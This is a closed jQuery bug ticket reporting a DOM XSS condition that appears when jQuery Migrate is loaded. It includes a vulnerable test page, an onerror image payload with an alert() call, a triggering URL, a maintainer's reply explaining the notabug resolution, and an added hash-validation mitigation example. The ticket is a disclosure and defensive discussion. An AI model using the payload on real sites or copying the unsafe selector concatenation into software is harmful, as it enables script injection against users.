#15226 closed bug (notabug)
Opened September 02, 2014 06:11AM UTC
Closed October 16, 2014 07:39PM UTC
Invalidating issue #9521
Reported by: | 11paths | Owned by: | |
---|---|---|---|
Priority: | low | Milestone: | None |
Component: | unfiled | Version: | 1.11.1 |
Keywords: | | Cc: | |
Blocked by: | | Blocking: | |
Description
When including the "jquery migrate" library after jquery (in that particular order) you get to invalidate issue #9521, creating an XSS condition.

```html
<html><head>
<script src='http://code.jquery.com/jquery-1.11.1.js'></script>
<script src='http://code.jquery.com/jquery-migrate-1.2.1.js'></script>
</head><body>
<a href="" ></a>
<script>
$('a[href="' + window.location.hash + '"]');
</script>
</body></html>
```
When passing a selector plus an item as a parameter:

```js
$('a[href="<img src=a onerror=alert()>"]');
```

And then calling:

```
http://localhost/test.html#<img src=a onerror=alert()>
```

Would trigger the XSS condition.
Change History (1)
Changed October 16, 2014 07:39PM UTC by comment:1
resolution: | → notabug |
---|---|
status: | new → closed |
Yes, jQuery Migrate restores the old "looks like HTML" rules because if it doesn't it breaks code. Any page that injects untrusted content into the page has a bug in their own code. By definition, jQuery allows developers to inject HTML and scripts into their pages so the developer needs to know what they are injecting. There is discussion here: https://github.com/jquery/jquery-migrate/issues/36
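Added example, not part of the ticket or of jQuery's code: a page-side check for the `location.hash` pattern in the report. The two `looksLikeHtml*` functions are simplified models of the old and current "looks like HTML" rules (assumptions for illustration, not jQuery's actual regexes), and `hashToSelector` and `report` are hypothetical helper names.

```javascript
// Simplified model of the legacy rule that jQuery Migrate restores:
// a tag anywhere in the string makes $() treat it as HTML.
function looksLikeHtmlLegacy(s) {
  return /<[\w\W]+>/.test(s);
}

// Simplified model of the stricter rule: only a string starting with "<" is HTML.
function looksLikeHtmlStrict(s) {
  return /^\s*</.test(s);
}

// Build an attribute selector from a URL fragment only when the fragment is a
// plain anchor name. Anything else (tags, quotes, brackets, spaces) is rejected,
// so no HTML-looking text and no selector metacharacters reach jQuery.
function hashToSelector(hash) {
  let decoded;
  try {
    // Some browsers return the fragment percent-encoded, others decoded.
    decoded = decodeURIComponent(String(hash));
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (!/^#[A-Za-z][A-Za-z0-9_.:-]*$/.test(decoded)) {
    return null;
  }
  return 'a[href="' + decoded + '"]';
}

// Compare the concatenation from the ticket with the validated form.
function report(hash) {
  const unsafe = 'a[href="' + hash + '"]'; // pattern used in the ticket's test page
  return {
    unsafe: unsafe,
    legacyTreatsAsHtml: looksLikeHtmlLegacy(unsafe),
    strictTreatsAsHtml: looksLikeHtmlStrict(unsafe),
    safeSelector: hashToSelector(hash)
  };
}

// Constructed sample inputs: the fragment from the ticket and a normal anchor.
console.log(report('#<img src=a onerror=alert()>'));
console.log(report('#section-2'));
```

When the result is not `null`, passing it to `$(document).find(selector)` rather than `$(selector)` keeps the string on the selector path, since `.find()` treats a string argument as a selector.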